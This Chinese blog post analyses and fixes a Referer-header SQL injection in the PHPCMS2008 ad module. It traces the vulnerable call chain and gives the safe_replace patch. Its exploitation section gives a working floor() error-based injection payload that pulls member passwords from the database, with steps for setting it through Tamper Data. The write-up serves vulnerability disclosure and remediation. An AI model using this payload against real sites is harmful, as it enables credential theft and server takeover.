PHPCMS2008广告模板SQL注入漏洞修复


Posted in PHP onOctober 11, 2016

00 漏洞描述

PHPCMS2008由于广告模块取referer不严,导致一处sql注入漏洞.可以得到管理员用户名与密码,攻击者登录后台后可能会获取webshell,对服务器进行进一步的渗透。

01 漏洞分析

漏洞产生的位置:

/ads/include/ads_place.class.phpshow方法中.

function show($placeid)
...
if($adses[0]['option'])
{
foreach($adses as $ads)
{
$contents[] = ads_content($ads, 1);
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);
$template = $ads['template'] ? $ads['template'] : 'ads';
}
}
...

sql语句中

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);

这里$this->referrer过this方法直接将HTTP请求头中的referer字段插入到数据库中,没有做任何过滤措施。(这个this方法是PHPCMS里面直接封装的)。

所以现在已经找到漏洞点,下一步就是找包含漏洞的用户可控的页面。如果漏洞是用户不可控的,比如只能管理员利用,那就相当的鸡肋了。

这里使用回溯的方法,看看哪些页面调用了它。

页面/ads/include/commom.inc.php

<?php 
...
require MOD_ROOT.'include/ads_place.class.php';
require MOD_ROOT.'include/ads.class.php';
...
?>

在往上看看谁调用了/ads/include/commom.inc.php

/ads/ad.php文件中

<?php
...
require './include/common.inc.php';
...
?>

ad.php文件为用户可控文件,但ad.php有时不能访问,继续向上查找/data/js.php

<?php
chdir(‘../ads/');
require ‘./ad.php';
?>

在用户访问首页时,会调用js.php,通过该文件可以提交有害字段,然后通过逐层调用,传入字段referer到危险方法show,引入SQL注入攻击。

02 漏洞利用

修改请求头中的referer字段的话有很多种,比如burpsuite,Tamper Data…

这里直接使用火狐的Tamper Data进行修改:

点击Start Tamper,然后访问http://your-addr/data/js.php?id=1

这时候Tamper Data会跳出来,在右边框内,点击右键,添加一个element值填写payload

referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#

这里我解释一下:因为漏洞的sql语句是INSERT是不回显的,所以可以使用盲注,这里的payload使用的floor报错注入。floor报错注入原理请参考:floor函数用法

把这个payload带入sql语句中是:

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘1',‘$time',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#,'0')”);

PHPCMS2008广告模板SQL注入漏洞修复

03 漏洞修复

对相关字段进行过滤处理。

$referer = safe_replace($this->referer);
$this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$referer', '$time', '0')");
$template = $ads['template'] ? $ads['template'] : 'ads';

这里safe_replace是PHPCMS2008封装的过滤函数。

以上所述是小编给大家介绍的PHPCMS2008广告模板SQL注入漏洞,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!

PHP 相关文章推荐
PHP4实际应用经验篇(4)
Oct 09 PHP
PHP获取网卡地址的代码
Apr 09 PHP
php smarty截取中文字符乱码问题?gb2312/utf-8
Nov 07 PHP
PHP设计模式之迭代器模式的深入解析
Jun 13 PHP
php查询mysql数据库并将结果保存到数组的方法
Mar 18 PHP
一张表搞清楚php is_null、empty、isset的区别
Jul 07 PHP
CentOS下搭建PHP环境与WordPress博客程序的全流程总结
May 07 PHP
PHP图像识别技术原理与实现
Oct 27 PHP
Yii CFileCache 获取不到值的原因分析
Feb 08 PHP
EarthLiveSharp中cloudinary的CDN图片缓存自动清理python脚本
Apr 04 PHP
php+javascript实现的动态显示服务器运行程序进度条功能示例
Aug 07 PHP
基于PHP常用文件函数和目录函数整理
Aug 17 PHP
php基于curl实现随机ip地址抓取内容的方法
Oct 11 #PHP
php 获取文件行数的方法总结
Oct 11 #PHP
PHP中文字符串截断无乱码解决方法
Oct 10 #PHP
PHP获取用户客户端真实IP的解决方案
Oct 10 #PHP
php表单加入Token防止重复提交的方法分析
Oct 10 #PHP
Laravel5中防止XSS跨站攻击的方法
Oct 10 #PHP
php中让人头疼的浮点数运算分析
Oct 10 #PHP
You might like
PHP 命名空间实例说明
2011/01/27 PHP
php牛逼的面试题分享
2013/01/18 PHP
php中的字符编码转换函数用法示例
2014/10/20 PHP
使用TextRange获取输入框中光标的位
2006/10/14 Javascript
[原创]站长必须要知道的javascript广告代码
2007/05/30 Javascript
js,jQuery 排序的实现代码,网页标签排序的实现,标签排序
2011/04/27 Javascript
jQuery实现单行文字间歇向上滚动源代码
2013/06/02 Javascript
Javascript 修改String 对象 增加去除空格功能(示例代码)
2013/11/30 Javascript
javascript复制粘贴与clipboardData的使用
2014/10/16 Javascript
js判断浏览器版本以及浏览器内核的方法
2015/01/20 Javascript
js实现多选项切换导航菜单的方法
2015/02/06 Javascript
使用jspdf生成pdf报表
2015/07/03 Javascript
基于jquery fly插件实现加入购物车抛物线动画效果
2016/04/05 Javascript
AngularJS实现网站换肤实例
2021/02/19 Javascript
JQ中$(window).load和$(document).ready区别与执行顺序
2017/03/01 Javascript
bootstrap-table组合表头的实现方法
2017/09/07 Javascript
深入浅析Vue全局组件与局部组件的区别
2018/06/15 Javascript
vue中el-input绑定键盘按键(按键修饰符)
2020/07/22 Javascript
VUE中V-IF条件判断改变元素的样式操作
2020/08/09 Javascript
[01:17]Ti4 循环赛第一日回顾
2014/07/11 DOTA
[01:14]TI珍贵瞬间系列(六):冠军
2020/08/30 DOTA
[53:10]完美世界DOTA2联赛决赛日 FTD vs GXR 第二场 11.08
2020/11/11 DOTA
新手该如何学python怎么学好python?
2008/10/07 Python
Pyspider中给爬虫伪造随机请求头的实例
2018/05/07 Python
使用python脚本实现查询火车票工具
2018/07/19 Python
Python3.7黑帽编程之病毒篇(基础篇)
2020/02/04 Python
python批量生成条形码的示例
2020/10/10 Python
python中pow函数用法及功能说明
2020/12/04 Python
css3一款3D字体带阴影效果的实现步骤
2013/03/20 HTML / CSS
网页中的电话号码如何实现一键直呼效果_附示例
2016/03/15 HTML / CSS
师德建设实施方案
2014/03/21 职场文书
暑假社会实践心得体会
2014/09/02 职场文书
初中生庆国庆演讲稿范文2014
2014/09/25 职场文书
运动会表扬稿
2015/01/16 职场文书
求职信范文怎么写
2015/03/19 职场文书
css3中2D转换之有趣的transform形变效果
2022/02/24 HTML / CSS